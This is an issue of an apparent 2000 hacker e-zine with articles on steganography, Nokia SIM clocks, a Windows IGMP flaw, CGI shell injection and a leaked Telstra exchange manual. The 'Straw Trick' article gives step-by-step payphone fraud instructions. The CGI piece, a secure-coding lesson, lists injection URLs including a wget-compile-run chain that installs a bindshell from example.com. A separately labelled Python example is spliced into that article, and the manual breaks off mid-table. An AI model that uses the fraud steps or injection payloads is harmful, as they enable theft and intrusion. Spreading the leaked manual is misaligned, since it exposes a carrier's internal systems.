[ASCII-art logo: info surge]                              asKi by k.

.----------------------------------------------------------------.
:  Official Web Site            -> http://infosurge.rendrag.net  :
:  Official Submissions         -> phase5@cmdrkeen.net           :
:  Official Author of the Month -> Dr. Seuss                     :
:                                                                :
:  issue #6: 26/07/2000                                          :
.________________________________________________________________.

          "decreasing the global cluefactor by 0.69%"

............................[ Table Of Contents ]...........................
[Intro ............................................................... phase5]
[Editorial ........................................................... phase5]
[Basic Steganography ................................................ ^jestar]
[Nokia SimClocks .................................................. assasss|n]
[IGMP Flaw in Windows ................................................. lymco]
[Straw Trick v2 ....................................................... gruf|]
[CGI Security .......................................................... fyre]
[ICM v2 Docs .................................................... MarlinSpike]
[A look into wiretapping ............................................. psyops]
[Ericsson GH337 ...................................................... Pottsy]
[Outro .............................................................. phase5]
[Total ................................................... infosurge (79.2kb)]

.................................[ shouts ].................................
[ shard ^jestar lymco eckz damien bsdave fyre heihachi xm k beatz stormie ]
[ assass|n synister cmdrkeen phunki ghengis head_rush tux x-circuit make\\ ]
[ alpha karag aphex Wewted cyberpuppet fed0 ]

........[ Editorial ].................................[ phase5 ]............

Back again with issue 6. For some reason, I received some complaints about issue 5. 'Lack of content' was the most common complaint. Strangely, those complaining about the < 3kb size were the same who had contributed 0kb. I'd just like to thank them all for their support. It was their tireless work that made is5 what it was.

On a related note, we desperately need articles, but that's nothing new.

While I'm here, I would like to thank those who have supported us, especially Damien for providing hosting and #phreak and #infosurge.

........[ Basic Steganography ].......................[ ^jestar ]............

> Intro

Steganography is the art of hiding information in such a way so that it is unnoticeable to the naked eye (or ear, or any manner of senses depending on what container you use). The basic concept of this is as follows.

Imagine you are James Bond (you know you want to) and you need to get a message back to M from the field without being detected (because being killed would be kind of detrimental to your living status), now I guess you are thinking to yourself "easy, I'll encrypt my message and send it in via email" (this being the age of the internet and all) but shock horror your email is intercepted by the evil super villain of the day, and this being the movies your message was decrypted in 10 seconds using a flashy computer system and you were found and *retired*.

As you can see, encrypting messages you want to keep secret is only as effective as the encryption method and strength you use. Now let's go through that scenario using steganography instead of normal encryption methods.
You work out your message and using steganography techniques you embed your message into a jpg image of you (bond, james bond) on holiday in Hawaii with your mother. You then email this back to M. The email is intercepted (pesky evil super villains) but all they see is holiday snaps of you and your mother, think nothing of it and send it on through. Your message gets through to M, who has been told in advance that any messages that you send would come through in that photo, and uses techniques to remove the stego payload from the image, leaving the message to get through unhindered.

Now that's a kinda odd description but it seems to point out pretty well what some of the benefits of steganography are. The power of it is that people can't read what they don't know is there.

> Common containers

I'm not sure if it's the actual technical term for the media in which you want to store the stego payload, but I call it the container. This makes sense to me because it will be *holding* the payload, and containers hold stuff (makes sense right?). Anyway, a stego container can be almost anything you can imagine, from the fairly obvious to the completely abstract. The following are some fairly obvious containers for a stego payload:

- Text
- Images
- Audio

There are also some containers which are completely abstract, you wouldn't even suspect that they might contain a hidden message. A quick scan around my room revealed these as the most abstract containers I could see:

- A deck of cards (order of cards could be a message)
- A cassette tape

I've also heard of some pretty ingenious methods being used for containers like manipulating the headers of tcp/ip packets, as you can see, I wasn't joking when I said basically anything could be a container. If you decide to use something that you think is fairly cool and isn't something people would think of straight away I would be interested in hearing about it (jestar@rendrag.net or ^jestar/#phreak@austnet.org).

Now onto the juicy stuff.
> Getting the message across

The technique for hiding the message will obviously be different depending on the container that you decide to use, and I will cover a few of the simpler methods in this article (it is a *basic* stego article after all). The theory covered for the basics will most likely be easily applied to whatever container you end up using.

>> text

There are a number of ways that you can embed a message in text but the easiest way is probably through character substitution. I'm not sure if that's the right word (again) but what I mean is this. You would take a normal sentence and hide the message in it, or more likely you would build a convincing sentence (or story) around your message. Here's a simple example:

Ok, the message is

    'i am sam, sam i am'

and here is the stego carrier, a paragraph of plain text

    'In Adelaide mall Sunday after morning, Sally ate maccas in Alans monaro'

You can probably see how that one worked, the first letter of each word is a letter of the payload. Now, that was pretty obvious, and if it's obvious then it ISN'T effective stego. In fact, I reckon my cat could spot that payload. Also, the container paragraph sounds kinda stilted, you can tell there's something not quite right with it because you had no choice in what letter the word would start with. I would suggest using something like the first letter of a sentence is a letter of the payload, which would make for a much more free flowing container, but on the downside a much longer container.

You can use pretty much any character manipulations you want, as long as the person on the receiving end knows exactly what you are using, after all, if you make it really good they are gonna have to know how to get the payload out.

>> images

Storing the stego payload in images is far more interesting, and if you get into steganography this is what you will probably mostly be using.
The idea is to work out what the least significant bits in the image file are (ie, the ones that *won't* affect the actual output of the image, or will only affect it slightly). You then replace these bits with the bits of your message. Of course, the amount of payload you can fit will differ depending on what picture you use, what colour depth the image is, what format the image is stored in and a number of other factors. You also need some way of recording which bits you have modified so that you can later remove the payload.

The end result of good image steganography is an identical image with and without the payload. The end result of bad image steganography can range from discoloured images to strange warping of the image, to any number of other odd effects (noise, blur etc).

> Would you like extra paranoia with that order?

If you are really stressed out about the message being intercepted (and let's face it, if you're using steganography then you are) then you will probably want the extra layer of defence that encrypting the payload would give, and there's no reason you shouldn't encrypt the payload before putting it into the container but remember that an encrypted message ends up being much larger than a non encrypted message (generally anyway) so you will either need a bigger container, or to split up the message into multiple containers (which may be required for larger payloads anyway). All something to think about.

> Closing

I hope you have found this very basic introduction to steganography interesting, and perhaps it will motivate you to find out more. There are many stego tools available at www.securityfocus.com if you are interested in giving some of them a try, for a variety of containers.

jestar

........[ Nokia SimClocks ]..........................[ assass|n ]............

I would like to clear up a bit of confusion out there in the phreaking community in regards to the stopping of the sim-card (Sim Clock) on a nokia 5110 : NSE-1.
The *#746025625# (*#sim0clock#) is a feature which is supposed to be a power saving feature which saves power by removing the charge from the sim-clock. When *#746025625# is entered into most nokia mobile phones it displays "Sim Clock Stop Allowed" or "Sim Clock Stop Not Allowed", but if you view the proper nokia technical documentation about Field Test Display it states some interesting information.

Section 3.5: Memory Handling - 3.5.1 Display 51: SIM information --> shows the display for the test function 51 which is as follows;

    ++++++++++++++   Example display:   ++++++++++++++
    +aaa bbb ccc +       MY Phone       +3   372 YES +
    +  dddddddd  +                      +DOWN(UP)    +
    + f g hh ii  +                      + 3 X 10 XX  +
    +   j kkkk   +                      + 0 0000     +
    ++++++++++++++                      ++++++++++++++

    aaa   Sim voltage selection type (5, 3 or 3/5)
    bbb   Sim baudrate (372, 64, 32 or 0)
    ccc   Clock stop allowed, Yes or No
    dddd  Clock stop condition, Up or down (PREFFERED)
    eee   Clock stopped, Yes or No (NOT IMPLEMENTED)
    f     pin1 attempts left (0,1,2,3)
    g     pin2 attempts left (0,1,2,3)
    hh    puk1 attempts left (0-10)
    ii    puk2 attempts left (0-10)
    j     ATR retransmission counter (0-9)
    kkkk  Transmission frame/parity errors, FE/PE + hexadecimal count

That clearly states that the option of stopping the sim clock was not implemented, but it does show the Sim Clock stop allowed feature, which on my phone is enabled. Therefore I have come to the conclusion that the ability to stop a Sim Clock is non-existent as the feature isn't on the display, meaning that you can find out about an ability which cannot actually be carried out.

So for all those people out there who tell me that they can get free calls by stopping the sim clock, simply explain how you are doing such a thing, cause I kinda aint buyin it :).

If you would like more information about what you have read or about the Nokia Field Test Display contact me through assassin@datasurge.net

........[ IGMP Flaw in Windows ].......................[ lymco ]............
This is a quick article to explain the glitch in the TCP/IP stack for Windows 9*, and NT 4.0. It may be approaching old school, however few people actually know about the problem, let alone understand it.

. what's the problem?

Sending fragmented IGMP packets to a Windows box can cause the operating system to lose performance and/or crash. IGMP (Internet Group Management Protocol) is a protocol in the TCP/IP suite, and is used for IP multicasting, where data sent to a single IP can reach multiple hosts.

. prevention

Microsoft have released patches at the following addresses:

Windows95:
  http://www.microsoft.com/windows95/downloads/contents/WUCritical/vip386/Default.asp
Windows98:
  http://www.microsoft.com/windows98/downloads/contents/WUCritical/VIP386/Default1.asp
Windows NT 4.0:
  ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa/NT40/hotfixes-postSP5/IGMP-fix/

. the exploit

A re-write of the original exploit can be found at: dev.spanner.net/scripts/pimp.c

Use it for securing boxes, not for running amok and DoS'ing random Windows users. (Disregard previous line, fed0).

. conclusion

This is an example of another Windows TCP/IP vulnerability. Instead of adding on more garbage to Windows each version, Microsoft should perhaps redo it from scratch. There is a chance they could get it right, after all, they are on the right track. Windows actually reminds me of hotdogs, a lot of crap gets thrown together to form it, yet it can still be satisfying.

If you have any comments/questions or hate mail, please direct it to lymco@spanner.net.

--
lymco
dev.spanner.net

........[ Straw Trick v2 ].............................[ gruf| ]............

Aha, payphones! Now, we have all heard of the entertaining things that it was possible to do with a $2 coin, a straw & a telstra payphone. Unfortunately, telstra heard of this as well, & (un)promptly spent several million fixing their little problem. And now there's another one.

--------------------
The Principle.
Apart from the fucking obvious one of free fone-calls... This seems to work only if you use one coin, that is worth more than a local call. (eg, 50c). If you use, say, a 20c coin the call only lasts for approx 20 seconds, and that is not the aim of the exercise :) -------------------- Well what is it then? Basically it goes like this. Get your trusty ald macca's straw out. And jettison it, get a thinner one. (Something like a normal straw from any servo or cafe) - Begin as you would if you were making a call & actually paying for it. ie, handset up, money in, start to dial. - Stop dialing, do not finish dialing, (do not let the phone connect). - Hold the flap covering the coin-return-bay CLOSED. - Utilising your trusty new straw (im my case conveniently located inside an old coke can beside the fone), slide the straw into the phone above and in the middle of the flap you are holding closed. - When the straw bottoms out (going upwards) violently smack the straw from side-to-side a few times. - Clink, goes your refunded coin. - $$ credit stays in fone. & your off like old fish. grufl@yahoo.com ........[ CGI Security ].................................[ fyre ]............ Basic CGI Security Fyre INTRODUCTION ------------ A few weeks ago, a friend of mine decided to write a web interface to the FIGlet program (http://st-www.cs.uiuc.edu/~chai/figlet.html for details). His naive implementation of the interface may have looked similar to the following PHP code: -- 8< -- 8< -- 8< -- webfig.php3 -- 8< -- 8< -- 8< -- webfig

-- 8< -- 8< -- 8< -- webfig.php3 -- 8< -- 8< -- 8< --

Throughout this article I've used PHP to illustrate my points since it's easier on the eyes, simpler to understand and seems to be quite popular recently, instead of a language like C, perl, python, tcl, pike, etc. Most languages will have the equivalent of a system() function with the same flaws as PHP's so this discussion is just as relevant to any language.

If you have a working Apache+PHP3 setup, enter the code for webfig.php3 from this article and follow the examples, it's much easier to illustrate how dangerous it is. Take care that the webfig.php3 can't be accessed by anyone else and remove it when you've finished with it just in case.

That script works (try it if you dare), the URL http://localhost/~fyre/webfig.php3?text=hi in a web browser produces this output:

 _     _
| |__ (_)
| '_ \| |
| | | | |
|_| |_|_|

(figlet 'hi' produces the same output)

PROBLEM
-------

Some people may stop there and sadly a lot of people do. However, the system() function in PHP, the popen() and exec() functions and the backtick operator (`) use the shell to execute the command. Most other languages have equivalent functions. Although my examples use PHP's system() function, the points I discuss are relevant to any function in any programming language that uses the shell to execute commands.

The SYSTEM(3) manpage, which documents the C system() function upon which the PHP function is based has this to say:

    system() executes a command specified in string by calling
    /bin/sh -c string and returns after the command has completed.

The entry for system() in the PHP manual says this:

    Note, that if you are going to allow data coming from user input to be
    passed to this function, then you should be using the EscapeShellCmd()
    function to make sure that users cannot trick the system into executing
    arbitrary commands.

This warning is often overlooked by inexperienced PHP programmers or people who have to get a job done in a hurry.
The way a user's input can "trick" the system into executing arbitrary commands is by having embedded shell metacharacters. These characters have a special meaning to the shell, from separating a list of commands to redirecting the output of a program somewhere, and must be "quoted" or "escaped" if this special meaning is not desired.

As I had expected, his script did not escape the shell metacharacters as the manual suggested. I tried something similar to this URL in my trusty Internet Explorer*: http://localhost/~fyre/webfig.php3?text=hi;ls - this is the somewhat scary output:

 _     _
| |__ (_)
| '_ \| |
| | | | |
|_| |_|_|
webfig.php3
very_secret_data

Yeek! The system() call here would have executed /bin/sh -c 'figlet hi;ls'. As you should have picked up, the ; character separates commands. The script has been "tricked" into executing both figlet and ls instead of only figlet.

The fun doesn't stop there. Just about every other shell metacharacter can be used to cause unexpected results and can pose a security risk. A few of the most useful ones (to the person trying to break in to your site) are:

; (semicolon) - Discussed above. Semicolons separate commands to be sequentially executed by the shell. Incredibly easy to use to breach security.
    (http://localhost/~fyre/webfig.php3?text=hi;ls)

| (vertical bar) - Pipes; output of preceding program is the input of the following program.
    (http://localhost/~fyre/webfig.php3?text=hi|ls)

&&, || (double-ampersand, double-bar) - These tell the shell to execute the following command (similar to semicolon) depending on the exit status of the previous command. double-ampersand executes the next command if and only if the previous command's exit status was 0 (success). double-bar executes the next command if and only if the previous command's exit status was nonzero (failure).
    (http://localhost/~fyre/webfig.php3?text=hi&&ls)

& (ampersand) - Executes the preceding command in the background and also separates commands.
    (http://localhost/~fyre/webfig.php3?text=hi&ls)

< > >> (triangle brackets) - Input and output redirection operators - these can be used to read the contents of other files or to write to files.
    (http://localhost/~fyre/webfig.php3?text=important_data)

`, $() (backticks, dollar-bracket) - Evaluates the shell commands between the backticks (`command`) or dollar-brackets ($(ls)).
    (http://localhost/~fyre/webfig.php3?text=hi`ls`)

newline - Newlines separate commands just like semicolons, although they're a little bit harder to get into a URL - The urlencoded form is %0A (see the note below).
    (http://localhost/~fyre/webfig.php3?text=hi%0Als)

$ (dollar) - Can be used to get the value of an environment variable.
    (http://localhost/~fyre/webfig.php3?text=$OSTYPE)

~ (tilde) - A single tilde is replaced with the current user's home directory (for example, ~ expands to /home/fyre). If the tilde is followed by a username, that user's home directory is used (for example, ~root expands to /root). However, if the username following a tilde is not present on the system, it is left alone (for example, if there is no account 'fred' on this system, ~fred stays as ~fred). This can be used to determine whether a user has an account on the system.

*, ? (star, question mark) - Wildcards. These can be used to get a listing of files in a directory matching a certain pattern. A single * may be used to list all files in the current directory as usual, or you may prefix it with a directory name, eg. /etc/*.
    (http://localhost/~fyre/webfig.php3?text=*)

Another character to watch out for is NUL (%00), which is used by C and the system as an end-of-string marker. For example, http://localhost/~fyre/webfig.php3?text=hi%00moo will only output "hi" since the system thinks the string ends at the NUL character and ignores the rest. Rain Forest Puppy's article in Phrack 55 has a nice discussion of the effect of NUL characters in the perl language.
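
Added example, not part of fyre's article or its webfig.php3: the same flaw and its fix in Python, where passing an argument list with no shell removes the metacharacter problem, and a leading '--' covers input that looks like an option (which the article comes to under SOLUTION). A constructed stand-in replaces figlet so the block runs without it; STAND_IN, render_shell and render_argv are names made up for this example.

```python
import shlex
import subprocess
import sys

# Constructed stand-in for figlet: it parses a -f option with getopt, as the
# article says figlet does, and reports what it received instead of drawing.
STAND_IN = (
    "import getopt, sys\n"
    "opts, args = getopt.getopt(sys.argv[1:], 'f:')\n"
    "font = dict(opts).get('-f', 'standard')\n"
    "print('font=%r text=%r' % (font, ' '.join(args)))\n"
)
PROG = [sys.executable, "-c", STAND_IN]


def render_shell(text):
    """Vulnerable shape: user text is pasted into a /bin/sh -c command line."""
    command = " ".join(shlex.quote(part) for part in PROG) + " " + text
    done = subprocess.run(command, shell=True, capture_output=True, text=True)
    return done.stdout


def render_argv(text, end_options=True):
    """No shell: the text travels as exactly one argv entry.

    With end_options set, '--' goes first so getopt-style parsers treat the
    text as data even when it starts with '-'.
    """
    if "\x00" in text:
        # argv strings are NUL-terminated in C, so a NUL cannot be carried;
        # reject it explicitly instead of letting anything be cut short.
        raise ValueError("NUL byte in input")
    argv = PROG + (["--"] if end_options else []) + [text]
    done = subprocess.run(argv, capture_output=True, text=True)
    return done.stdout


if __name__ == "__main__":
    # Constructed inputs taken from the article's own URLs, with echo in
    # place of ls so the result does not depend on the current directory.
    for sample in ("hi", "hi;echo INJECTED", "-f small hi"):
        print(repr(sample))
        print("  shell       :", render_shell(sample).splitlines())
        print("  argv        :", render_argv(sample, False).splitlines())
        print("  argv + '--' :", render_argv(sample).splitlines())
```
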
In summary, the W3C recommends escaping these characters:

    &;`'\"|*?~<>^()[]{}$\n\r

Note that not all characters are valid in URL's, and some are processed specially by the webserver (ampersands, for example) - you must 'urlencode' these characters by replacing them with a percent sign ('%') followed by the two digit hexadecimal representation of their ASCII code. For example, %0A is ASCII 0A hex, 10 decimal, newline. If that sounds too much like hard work, this little C program may help:

-- 8< -- 8< -- 8< -- urlencode.c -- 8< -- 8< -- 8< --
#include <stdio.h>

int main ()
{
    int c;

    /* write every input byte as %XX (two hex digits) */
    while ((c = getchar()) != EOF)
        printf ("%%%02x", c);
    putchar ('\n');
    return 0;
}
-- 8< -- 8< -- 8< -- urlencode.c -- 8< -- 8< -- 8< --

It urlencodes its standard input and writes it to standard output. You might use it like this:

    $ echo -n 'hi;ls' | urlencode
    %68%69%3b%6c%73

... but that's not very relevant, we're writing secure scripts here not taking advantage of other programmers' mistakes, right? ;>

Listing files is the tip of the iceberg. Have a look at this example (%20 is the space character):

    http://localhost/~fyre/webfig.php3?text=hi;wget%20http://www.example.com/bindshell.c
    http://localhost/~fyre/webfig.php3?text=hi;cc%20bindshell.c%20-o%20bindshell
    http://localhost/~fyre/webfig.php3?text=hi;./bindshell

There the malicious evil d00d has downloaded a 'bindshell' (a program that usually listens on a TCP port and drops anyone connecting to that port into a shell, bypassing the normal login sequence. It does not usually show up in logs, either), then compiled it with cc, the C compiler, and finally executed it. They now have the privileges of the user CGI scripts are run as, which will depend on your configuration. Now that they have access to a shell, there are far more vulnerabilities they can try to use to gain superuser access.

SOLUTION
--------

Hopefully that has scared you into writing code that avoids all the problems associated with shell metacharacters.
Luckily for you, PHP's escapeshellcmd() function comes to the rescue! Its purpose is to "escape shell metacharacters", it prefixes them with a backslash (\) so the shell does not treat them specially. For example, the string "hi;ls" would be converted to "hi\;ls". A more secure version of webfig.php3:

-- 8< -- 8< -- 8< -- webfig.php3 -- 8< -- 8< -- 8< --
webfig

-- 8< -- 8< -- 8< -- webfig.php3 -- 8< -- 8< -- 8< --

This time we use escapeshellcmd() to stop malicious people "tricking" the shell into doing things it shouldn't before using their input. When we try the earlier example of http://localhost/~fyre/webfig.php3?text=hi;ls we get the following (better) output:

 _     _   _
| |__ (_)_| |___
| '_ \| (_) / __|
| | | | |_| \__ \
|_| |_|_( )_|___/
        |/

That is much better, and none of the previously mentioned metacharacters cause any adverse effects when used in the 'text' parameter.

I'm still a little bit scared of the system() function since it may not understand every metacharacter your shell does. If you're paranoid, you could escape _every_ character with a backslash (\). "hi;ls" becomes "\h\i\;\l\s". As you can see, this makes the string unreadable and doubles the storage required to hold it.

As you might have realised, there is still at least one more problem with our improved webfig.php3. Remember that UNIX interprets command line arguments beginning with a '-' as options. We can specify command line options to the figlet program by embedding them in the 'text' variable! For example, http://localhost/~fyre/webfig.php3?text=-f%20small%20hi is executed as "figlet -f small hi", which uses a different font via the -f option. The figlet program doesn't seem to have any dangerous command line arguments, except perhaps the -f, -d and -C options which read from files. They seem to be quite picky about their input, however, and I haven't been able to make them display arbitrary files.

As a special case, if '--' is encountered then option processing is terminated. When invoked as "figlet -- -f small hi", the '-f' is not treated as a command line argument, instead it is treated as normal text. See the GETOPT(3) manpage for specific details on how options are processed in most (not all) programs.

The following version of webfig.php3 is a little more secure:

-- 8< -- 8< -- 8< -- webfig.php3 -- 8< -- 8< -- 8< --
webfig

-- 8< -- 8< -- 8< -- webfig.php3 -- 8< -- 8< -- 8< --

It is left as an exercise to the reader to find additional security holes in the above version of webfig.php3 :)

CONCLUSION
----------

I've touched on just one of the many important security problems faced by any programs running at a privilege level above that of the user causing the commands to execute. CGI scripts have this problem since the user should not be able to cause execution of arbitrary commands on a webserver. setuid and setgid programs on UNIX systems have this problem (along with a bunch of other problems) - they run as a privileged user (setuid root programs pose the most danger, although setgid tty and setgid mail are almost as bad).

In conclusion, I recommend you avoid system() and the other similar functions in whatever language you choose like the plague unless you're absolutely sure you've done it properly.

That's all from me...

*Internet Explorer: Don't start this flamewar with me. Show me a better browser and I'll try it.

........[ ICM v2 Docs ]...........................[ MarlinSpike ]............

ICM V2 - EXCHANGE END USERS MANUAL

Here is a manual I recently 'acquired' about the ICM and related systems in use in our exchanges. This is an exact transcript of the manual, word for word, line for line. This is the second version of the system, so I imagine the third version is in use in some exchanges around Australia, but this system may be in use in your local exchange. At the very least, it gives you an example of the kind of equipment used in exchanges and can familiarise you with this type of equipment. It will also help you learn a lot of the jargon and procedures used by Telstra and it is a piece of whatever puzzle it is you may be trying to solve. Anyway, if you ever get access to this system, it wouldn't do for you to not be able to utilise it, now would it?

CONTENTS

1. INTRODUCTION
  1.1 THE CONCEPT OF INDIVIDUAL CIRCUIT MONITORING
    1.1.1 General
    1.1.2 Circuit Performance Management
    1.1.3 Fault Detection
    1.1.4 Limitations
  1.2 THE ICM SYSTEM HARDWARE STRUCTURE
    1.2.1 General
    1.2.2 Central Computer System
    1.2.3 Exchange-based Equipment
  1.3 CENTRAL COMPUTER FUNCTIONS
    1.3.1 Establishing Communications
    1.3.2 Time Syncronisation
    1.3.3 Configurations and Passwords
    1.3.4 Remote Usage/Pegcount Polling
    1.3.5 Poll Reports

2. PRINTER/TERMINAL
  2.1 GENERAL
    2.1.1 On Line Indication
    2.1.2 Enabling/Disabling Printouts
  2.2 CONFIGURING
    2.2.1 Configuration Table
    2.2.2 References

3. CONTROLLER AND COMMUNICATIONS INTERFACE (CCI)
  3.1 GENERAL
    3.1.1 Power Up
    3.1.2 Diagnostics
  3.2 FRONT PANEL
    3.2.1 Idle LED Pattern
    3.2.2 Modem LEDs
    3.2.3 Printer/Terminal Port
    3.2.4 GPIB Ports
    3.2.5 Push Buttons
  3.3 ERROR DIAGNOSTICS
    3.3.1 GPIB Monitoring
  3.4 LINE TESTING

4. INDIVIDUAL CIRCUIT MONITORING MODULES
  4.1 GENERAL
  4.2 INSTALLATION
    4.2.1 Power Up
    4.2.2 Replacement
    4.2.3 Precautions

5. SYSTEM OPERATION
  5.1 LOCAL FUNCTIONS FROM PRINTER/TERMINAL
    5.1.1 General
  5.2 IDLE MODE COMMANDS
    5.2.1 Listing Configurations
    5.2.2 ICMM Status Request
    5.2.3 Central Computer Link Status
    5.2.4 Central Computer Link Statistics
    5.2.5 Dynamic Memory Status
    5.2.6 Time Request
    5.2.7 Poll Status
    5.2.8 Request Group Report
    5.2.10 Request Transaction Report
    5.2.11 Help
  5.3 SPECIAL MODE COMMANDS
    5.3.1 Local Poll Mode
      5.3.1.1 Polling an ICMM
      5.3.1.2 Polling a Group
      5.3.1.3 Swapping Registers
      5.3.1.4 Exiting Local Poll
    5.3.2 Transactions Mode
      5.3.2.1 General
      5.3.2.2 Content of Transactions
      5.3.2.3 Create/Modify a Group
      5.3.2.4 Delete a Group
      5.3.2.5 Create a Line
      5.3.2.6 Modify a Line
      5.3.2.7 Delete an Exchange
      5.3.2.8 Edit Transactions
    5.3.3 Remote Terminal Mode
    5.3.4 Message Mode
      5.3.4.1 General
      5.3.4.2 Editing Messages
    5.3.5 ICMM Test Mode
    5.3.6 Communications Mode
  5.4 EXITING MODES

6. DATABASE MANAGEMENT
  6.1 GENERAL POLICY
  6.2 NEW INSTALLATIONS
  6.3 AMENDING EXISTING DATABASES
  6.4 CODING OF DATA FOR ICM

7. ICM REPORTS
  7.1 GENERAL
  7.2 REPORT TYPES
    7.2.1 Detailed
    7.2.2 Exception
    7.2.3 Group Summary
    7.2.4 Crossed Leads

8. HARDWARE MAINTENANCE AND ROUTINE CHECKS
  8.1 GENERAL
  8.2 PROVEN FAULTY EQUIPMENT
    8.2.1 ICMM
    8.2.2 CCI
    8.2.3 Printer
  8.3 ALARMS
  8.4 ROUTINE CHECKS
    8.4.1 CCI
    8.4.2 ICMM
    8.4.3 PRINTER

9. FAULT FINDING
  9.1 GENERAL
  9.2 FAULT TYPES
    9.2.1 Always Idle (AI)
    9.2.2 Always Busy
    9.2.3 High Pegcount, Low Holding
    9.2.4 Low Pegcount, High Holding
    9.2.5 Low Pegcount, Normal Holding
    9.2.6 High Pegcount, Normal Holding

APPENDICES
  APPENDIX A: Coding of Input Data
  APPENDIX B: Hexadecimal to Decimal Conversions

1. INTRODUCTION

1.1 THE CONCEPT OF INDIVIDUAL CIRCUIT MONITORING

1.1.1 General

The concept of ICM is based in the fact that all lines in a route should, over a sufficiently large sample exhibit similar average hold times. Lines which are never seized, permanently seized, or have hold times significantly different from the average for the route are presumed worthy of investigation and may possibly be faulty.

1.1.2 Circuit Performance Measurement

The ICM System monitors Exchange plant by detecting "events" and "event states". An "event" is defined as a transition from the inactive or idle state to an active or busy state and vice-versa. An "event state" is the idle or busy state. The circuits to which ICM test leads are connected are referred to as "lines".

From this event detection the ICM system collects the following attributes for each line :-

- Pegcount : The number of times a line is seized in a given period. This is simply the number of "events".
- Usage : The accumulated time the line spent in it's event state during the same period.

The ICM system accumulates these attributes over a time period known as a 'Poll' period.
At the completion of a Poll period the data is collected by the Central computer and various reports are generated which highlight suspect lines. 1.1.3 Fault Detection The ICM system compares this data with minimum and maximum expectation 'thresholds' and then produces reports on any circuit behaviour variations in a group/route. These 'thresholds' are not specified line-by-line but on a group of lines by the ICM operator. Typical thresholds are listed below. They can vary from group to group, day to day, hour to hour. In fact there is a lot of "fine-tuning" necessary to reduce the number [of] non-faulty circuits reported on. LP (Low Pegcount) Less than 1 an hour HP (High Pegcount) More than 50 an hour LH (Low Holding) Less than 30 secs a call HH (High Holding) More than 3550 secs a call LU (Low Usage) Less than 50 secs an hour HU (High Usage) More than 3550 secs an hour AI (Always Idle) Never seized AB (Always Busy) Permanently seized A high Pegcount with a low Average Hold-time are likely symptoms of a line dropping out before the call is completed. Conversely high Average Hold-time and low Pegcount may indicate that a circuit is being held for an undue length of time. 1.1.4 Limitations The system only identifies "probable faults" and it is possible for lines to be deemed faulty when in fact they are not. For example, very high usage figures approaching 3600 seconds in a one hour period may indicate a call that is not releasing properly. It may also indicate a valid call of an unusual duration. Similarly, very low or 0 usage figures in a period may indicate a cct that is not being seized or a period of little or no traffic. [cct = circuit?] 1.2 THE ICM SYSTEM HARDWARE STRUCTURE 1.2.1 General The ICM System hardware consists of equipment at both the Central site and a number of Exchanges. 1.2.2 The Central site consists of the following items :- - WICAT 200 computer on which the main ICM system software runs under a WMCS operating system. - A hard disc (84mb). 
    - A 9 track Winchester magnetic tape unit.
    - 2 VDUs for system control and data maintenance.
    - A hi-speed printer.
    - Front End Processors through which the computer communicates with
      the exchanges via modems.

1.2.3 Exchange-based Equipment

The Exchange equipment consists of the following :-

    - Individual Circuit Monitoring Modules (ICMM). An ICMM can monitor
      256 lines. The Exchange ICM can be expanded in increments of 256.
    - ICM Terminal unit frame. A frame can hold up to 14 ICMMs. There is
      one frame per ICMM rack.
    - Controller and Communications Interface (CCI). The CCI collects the
      data from the ICMMs and transmits it to the Central computer over
      leased modem links.
    - The CCI also provides an interface for the ICM printer/terminal.
      Some control functions can be performed by local Exchange staff.
      The CCI front panel and the printer/terminal provide limited status
      and diagnostics.

1.3 CENTRAL COMPUTER FUNCTIONS

1.3.1 Establishing Communications

The link between the CCI and the Central site is under the control of an
error correcting protocol. Whenever the CCI is powered-up it attempts to
talk with the Central computer. When 'end-to-end comms' have been
established, the CCI prints out a message:-

    COMMS ON LINE

When the CCI cannot communicate with the Central Computer, a message is
printed:-

    COMMS LINE BREAK

If there has been a shut-down and re-boot of the Central site then the
message is:-

    CENTRAL SITE POWER UP

1.3.2 Time Synchronisation

The CCI contains a battery operated clock which is set by the Central
computer when the CCI powers-up and at each Poll request.

1.3.3 Configurations and Passwords

When a CCI powers up a command is sent to the Central computer asking for
the Configuration and Group Definitions to be downloaded. These are then
stored in the CCI memory. New configurations are automatically sent
whenever the database is updated. The CCI will print out a message to
this effect. Local staff can list them with the L command.
The CCI requires Group Definitions/Configurations so that it knows the
ICMM and inlet for each line in each group. This information is used for
both local and remote polling.

1.3.4 Remote Usage/Pegcount Polling

The CCI and Central computer remote polling works unseen to local staff
except for the reports sent to CCI and printer. For interested local
staff a brief description will be given.

Remote polling begins with the creation of a POLL/REPORT SCHEDULE by the
Central Computer operator. This schedule contains the groups of lines to
be polled, the poll times and the reports required.

When polling starts a command is sent to the CCI telling it which lines
to poll next. The CCI maps these groups of lines to GPIB/ICMM addresses
using the Group Definitions stored in memory.

When a Poll command is received from the Central computer the CCI sends
commands to relevant ICMMs to swap their idle and active registers. After
the swap the Central computer can ask the CCI for the pegcount and usage
data. The CCI asks each ICMM for this data and transmits it to the
Central site. The Central computer tells the CCI which groups of lines to
poll next and the time to poll them.

1.3.5 Poll Reports

Depending on the Poll/Report Schedule, reports are sent to the exchange
concerned. These reports are printed if the CCI is in the Idle mode. If,
however, the CCI has been placed into another operating mode a message
will be printed out and the user has 30 seconds to exit out of the mode.
Should the user decide not to exit, the CCI will over-ride and print the
report before returning to the user-selected mode.


2. PRINTER/TERMINAL

2.1 GENERAL

The CCI prints Local and Central Computer reports and messages on the
printer/terminal and interprets and executes commands entered from the
key-board.

The printer/terminal is a Digital LA-100 type, and may be located
remotely from the ICM rack provided the length of the cable does not
exceed 20 metres.
The printer/terminal will be installed and configured by the ICM
Installation group. Should the LA-100 develop a fault it may require
re-configuring for ICM format. Ref 2.2.

2.1.1 On Line Indication

If the printer is correctly configured and the CCI recognises it then the
following lamps glow :-

    CTS, LINE, DSR and POWER

2.1.2 Enabling/Disabling Printouts

A printout can be suspended with the keys :-

    CTRL+S

This command sends a 'XOFF' to the CCI which is recognised as a command
to suspend printing. The 'BLOCKED' lamps on the CCI will glow.

The CCI can be instructed to restart printing with the keys:

    CTRL+Q

A 'XON' character is sent to the CCI and printing recommences. The
'ON LINE' on the CCI will glow.

Never leave the printer unattended in the BLOCKED condition. The only
time the CTRL+S and CTRL+Q keys should be used is if the printer runs out
of paper or the paper jams.

2.2 CONFIGURING

2.2.1 Configuration Table

To check the current configuration of the LA-100

    - Press LOCAL key.
    - Press CTRL+SETUP keys together.
    - Press STATUS key.

The current configuration table will be printed and must be as listed
below for ICM operation.

    LA100 V1.3 KSR 0.4K Buffer DPSs: 006. ...............

    ***Keyboard Settings :
    E-Local echo:Disabled
    K-Keyboard:United States
    L-Return Key:
